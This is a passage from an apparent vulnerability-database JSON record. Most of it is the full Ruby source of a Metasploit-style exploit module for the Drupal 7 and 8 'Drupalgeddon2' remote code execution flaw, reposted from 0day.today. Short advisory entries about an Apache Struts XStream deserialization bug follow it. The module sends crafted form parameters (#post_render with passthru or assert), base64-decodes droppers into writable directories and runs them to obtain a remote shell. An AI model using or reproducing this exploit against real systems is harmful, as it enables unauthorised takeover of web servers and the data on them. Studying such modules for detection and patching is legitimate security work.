'Type' => :linux_dropper\r\n ],\r\n #\r\n # Drupal 7.x targets (PHP, cmd/unix, native)\r\n #\r\n ['Drupal 7.x (PHP In-Memory)',\r\n 'Platform' => 'php',\r\n 'Arch' => ARCH_PHP,\r\n 'Version' => Gem::Version.new('7.x'),\r\n 'Type' => :php_memory\r\n ],\r\n ['Drupal 7.x (PHP Dropper)',\r\n 'Platform' => 'php',\r\n 'Arch' => ARCH_PHP,\r\n 'Version' => Gem::Version.new('7.x'),\r\n 'Type' => :php_dropper\r\n ],\r\n ['Drupal 7.x (Unix In-Memory)',\r\n 'Platform' => 'unix',\r\n 'Arch' => ARCH_CMD,\r\n 'Version' => Gem::Version.new('7.x'),\r\n 'Type' => :unix_memory\r\n ],\r\n ['Drupal 7.x (Linux Dropper)',\r\n 'Platform' => 'linux',\r\n 'Arch' => [ARCH_X86, ARCH_X64],\r\n 'Version' => Gem::Version.new('7.x'),\r\n 'Type' => :linux_dropper\r\n ],\r\n #\r\n # Drupal 8.x targets (PHP, cmd/unix, native)\r\n #\r\n ['Drupal 8.x (PHP In-Memory)',\r\n 'Platform' => 'php',\r\n 'Arch' => ARCH_PHP,\r\n 'Version' => Gem::Version.new('8.x'),\r\n 'Type' => :php_memory\r\n ],\r\n ['Drupal 8.x (PHP Dropper)',\r\n 'Platform' => 'php',\r\n 'Arch' => ARCH_PHP,\r\n 'Version' => Gem::Version.new('8.x'),\r\n 'Type' => :php_dropper\r\n ],\r\n ['Drupal 8.x (Unix In-Memory)',\r\n 'Platform' => 'unix',\r\n 'Arch' => ARCH_CMD,\r\n 'Version' => Gem::Version.new('8.x'),\r\n 'Type' => :unix_memory\r\n ],\r\n ['Drupal 8.x (Linux Dropper)',\r\n 'Platform' => 'linux',\r\n 'Arch' => [ARCH_X86, ARCH_X64],\r\n 'Version' => Gem::Version.new('8.x'),\r\n 'Type' => :linux_dropper\r\n ]\r\n ],\r\n 'DefaultTarget' => 0, # Automatic (PHP In-Memory)\r\n 'DefaultOptions' => {'WfsDelay' => 2}\r\n ))\r\n\r\n register_options([\r\n OptString.new('TARGETURI', [true, 'Path to Drupal install', '/']),\r\n OptString.new('PHP_FUNC', [true, 'PHP function to execute', 'passthru']),\r\n OptBool.new('DUMP_OUTPUT', [false, 'If output should be dumped', false])\r\n ])\r\n\r\n register_advanced_options([\r\n OptBool.new('ForceExploit', [false, 'Override check result', false]),\r\n OptString.new('WritableDir', [true, 'Writable dir for droppers', '/tmp'])\r\n ])\r\n end\r\n\r\n def check\r\n checkcode = CheckCode::Safe\r\n\r\n if drupal_version\r\n print_status(\"Drupal #{@version} targeted at #{full_uri}\")\r\n checkcode = CheckCode::Detected\r\n else\r\n print_error('Could not determine Drupal version to target')\r\n return CheckCode::Unknown\r\n end\r\n\r\n if drupal_unpatched?\r\n print_good('Drupal appears unpatched in CHANGELOG.txt')\r\n checkcode = CheckCode::Appears\r\n end\r\n\r\n token = random_crap\r\n res = execute_command(token, func: 'printf')\r\n\r\n if res && res.body.start_with?(token)\r\n checkcode = CheckCode::Vulnerable\r\n end\r\n\r\n checkcode\r\n end\r\n\r\n def exploit\r\n unless check == CheckCode::Vulnerable || datastore['ForceExploit']\r\n fail_with(Failure::NotVulnerable, 'Set ForceExploit to override')\r\n end\r\n\r\n if datastore['PAYLOAD'] == 'cmd/unix/generic'\r\n print_warning('Enabling DUMP_OUTPUT for cmd/unix/generic')\r\n # XXX: Naughty datastore modification\r\n datastore['DUMP_OUTPUT'] = true\r\n end\r\n\r\n # NOTE: assert() is attempted first, then PHP_FUNC if that fails\r\n case target['Type']\r\n when :php_memory\r\n execute_command(payload.encoded, func: 'assert')\r\n\r\n sleep(wfs_delay)\r\n return if session_created?\r\n\r\n # XXX: This will spawn a *very* obvious process\r\n execute_command(\"php -r '#{payload.encoded}'\")\r\n when :unix_memory\r\n execute_command(payload.encoded)\r\n when :php_dropper, :linux_dropper\r\n dropper_assert\r\n\r\n sleep(wfs_delay)\r\n return if session_created?\r\n\r\n dropper_exec\r\n end\r\n end\r\n\r\n def dropper_assert\r\n php_file = Pathname.new(\r\n \"#{datastore['WritableDir']}/#{random_crap}.php\"\r\n ).cleanpath\r\n\r\n # Return the PHP payload or a PHP binary dropper\r\n dropper = get_write_exec_payload(\r\n writable_path: datastore['WritableDir'],\r\n unlink_self: true # Worth a shot\r\n )\r\n\r\n # Encode away potential badchars with Base64\r\n dropper = Rex::Text.encode_base64(dropper)\r\n\r\n # Stage 1 decodes the PHP and writes it to disk\r\n stage1 = %Q{\r\n file_put_contents(\"#{php_file}\", base64_decode(\"#{dropper}\"));\r\n }\r\n\r\n # Stage 2 executes said PHP in-process\r\n stage2 = %Q{\r\n include_once(\"#{php_file}\");\r\n }\r\n\r\n # :unlink_self may not work, so let's make sure\r\n register_file_for_cleanup(php_file)\r\n\r\n # Hopefully pop our shell with assert()\r\n execute_command(stage1.strip, func: 'assert')\r\n execute_command(stage2.strip, func: 'assert')\r\n end\r\n\r\n def dropper_exec\r\n php_file = \"#{random_crap}.php\"\r\n tmp_file = Pathname.new(\r\n \"#{datastore['WritableDir']}/#{php_file}\"\r\n ).cleanpath\r\n\r\n # Return the PHP payload or a PHP binary dropper\r\n dropper = get_write_exec_payload(\r\n writable_path: datastore['WritableDir'],\r\n unlink_self: true # Worth a shot\r\n )\r\n\r\n # Encode away potential badchars with Base64\r\n dropper = Rex::Text.encode_base64(dropper)\r\n\r\n # :unlink_self may not work, so let's make sure\r\n register_file_for_cleanup(php_file)\r\n\r\n # Write the payload or dropper to disk (!)\r\n # NOTE: Analysis indicates > is a badchar for 8.x\r\n execute_command(\"echo #{dropper} | base64 -d | tee #{php_file}\")\r\n\r\n # Attempt in-process execution of our PHP script\r\n send_request_cgi(\r\n 'method' => 'GET',\r\n 'uri' => normalize_uri(target_uri.path, php_file)\r\n )\r\n\r\n sleep(wfs_delay)\r\n return if session_created?\r\n\r\n # Try to get a shell with PHP CLI\r\n execute_command(\"php #{php_file}\")\r\n\r\n sleep(wfs_delay)\r\n return if session_created?\r\n\r\n register_file_for_cleanup(tmp_file)\r\n\r\n # Fall back on our temp file\r\n execute_command(\"echo #{dropper} | base64 -d | tee #{tmp_file}\")\r\n execute_command(\"php #{tmp_file}\")\r\n end\r\n\r\n def execute_command(cmd, opts = {})\r\n func = opts[:func] || datastore['PHP_FUNC'] || 'passthru'\r\n\r\n vprint_status(\"Executing with #{func}(): #{cmd}\")\r\n\r\n res =\r\n case @version.to_s\r\n when '7.x'\r\n exploit_drupal7(func, cmd)\r\n when '8.x'\r\n exploit_drupal8(func, cmd)\r\n end\r\n\r\n if res && res.code != 200\r\n print_error(\"Unexpected reply: #{res.inspect}\")\r\n return\r\n end\r\n\r\n if res && datastore['DUMP_OUTPUT']\r\n print_line(res.body)\r\n end\r\n\r\n res\r\n end\r\n\r\n def drupal_version\r\n if target['Version']\r\n @version = target['Version']\r\n return @version\r\n end\r\n\r\n res = send_request_cgi(\r\n 'method' => 'GET',\r\n 'uri' => target_uri.path\r\n )\r\n\r\n return unless res && res.code == 200\r\n\r\n # Check for an X-Generator header\r\n @version =\r\n case res.headers['X-Generator']\r\n when /Drupal 7/\r\n Gem::Version.new('7.x')\r\n when /Drupal 8/\r\n Gem::Version.new('8.x')\r\n end\r\n\r\n return @version if @version\r\n\r\n # Check for a <meta> tag\r\n generator = res.get_html_document.at(\r\n '//meta[@name = \"Generator\"]/@content'\r\n )\r\n\r\n return unless generator\r\n\r\n @version =\r\n case generator.value\r\n when /Drupal 7/\r\n Gem::Version.new('7.x')\r\n when /Drupal 8/\r\n Gem::Version.new('8.x')\r\n end\r\n end\r\n\r\n def drupal_unpatched?\r\n unpatched = true\r\n\r\n # Check for patch level in CHANGELOG.txt\r\n uri =\r\n case @version.to_s\r\n when '7.x'\r\n normalize_uri(target_uri.path, 'CHANGELOG.txt')\r\n when '8.x'\r\n normalize_uri(target_uri.path, 'core/CHANGELOG.txt')\r\n end\r\n\r\n res = send_request_cgi(\r\n 'method' => 'GET',\r\n 'uri' => uri\r\n )\r\n\r\n return unless res && res.code == 200\r\n\r\n if res.body.include?('SA-CORE-2018-002')\r\n unpatched = false\r\n end\r\n\r\n unpatched\r\n end\r\n\r\n def exploit_drupal7(func, code)\r\n vars_get = {\r\n 'q' => 'user/password',\r\n 'name[#post_render][]' => func,\r\n 'name[#markup]' => code,\r\n 'name[#type]' => 'markup'\r\n }\r\n\r\n vars_post = {\r\n 'form_id' => 'user_pass',\r\n '_triggering_element_name' => 'name'\r\n }\r\n\r\n res = send_request_cgi(\r\n 'method' => 'POST',\r\n 'uri' => target_uri.path,\r\n 'vars_get' => vars_get,\r\n 'vars_post' => vars_post\r\n )\r\n\r\n return res unless res && res.code == 200\r\n\r\n form_build_id = res.get_html_document.at(\r\n '//input[@name = \"form_build_id\"]/@value'\r\n )\r\n\r\n return res unless form_build_id\r\n\r\n vars_get = {\r\n 'q' => \"file/ajax/name/#value/#{form_build_id.value}\"\r\n }\r\n\r\n vars_post = {\r\n 'form_build_id' => form_build_id.value\r\n }\r\n\r\n send_request_cgi(\r\n 'method' => 'POST',\r\n 'uri' => target_uri.path,\r\n 'vars_get' => vars_get,\r\n 'vars_post' => vars_post\r\n )\r\n end\r\n\r\n def exploit_drupal8(func, code)\r\n # Clean URLs are enabled by default and \"can't\" be disabled\r\n uri = normalize_uri(target_uri.path, 'user/register')\r\n\r\n vars_get = {\r\n 'element_parents' => 'account/mail/#value',\r\n 'ajax_form' => 1,\r\n '_wrapper_format' => 'drupal_ajax'\r\n }\r\n\r\n vars_post = {\r\n 'form_id' => 'user_register_form',\r\n '_drupal_ajax' => 1,\r\n 'mail[#type]' => 'markup',\r\n 'mail[#post_render][]' => func,\r\n 'mail[#markup]' => code\r\n }\r\n\r\n send_request_cgi(\r\n 'method' => 'POST',\r\n 'uri' => uri,\r\n 'vars_get' => vars_get,\r\n 'vars_post' => vars_post\r\n )\r\n end\r\n\r\n def random_crap\r\n Rex::Text.rand_text_alphanumeric(8..42)\r\n end\r\n\r\nend\n\n# 0day.today [2018-04-26] #", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://0day.today/exploit/30268"}], "github": [{"lastseen": "2020-03-10T23:26:10", "bulletinFamily": "software", "description": "The REST Plugin in Apache Struts 2.1.2 through 2.3.x before 2.3.34 and 2.5.x before 2.5.13 uses an XStreamHandler with an instance of XStream for deserialization without any type filtering, which can lead to Remote Code Execution when deserializing XML payloads.", "modified": "2019-07-03T21:02:04", "published": "2018-10-16T19:37:56", "id": "GHSA-GG9M-FJ3V-R58C", "href": "https://github.com/advisories/GHSA-gg9m-fj3v-r58c", "title": "Moderate severity vulnerability that affects org.apache.struts:struts2-rest-plugin", "type": "github", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "dsquare": [{"lastseen": "2019-05-29T15:31:56", "bulletinFamily": "exploit", "description": "Remote command execution vulnerability in Apache Struts REST plugin XStream XML request\n\nVulnerability Type: Remote Command Execution", "modified": "2018-04-20T00:00:00", "published": "2018-04-20T00:00:00", "id": "E-643", "href": "", "type": "dsquare", "title": "Apache Struts REST Plugin XStream RCE", "sourceData": "For the exploit source code contact DSquare Security sales team.", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}]}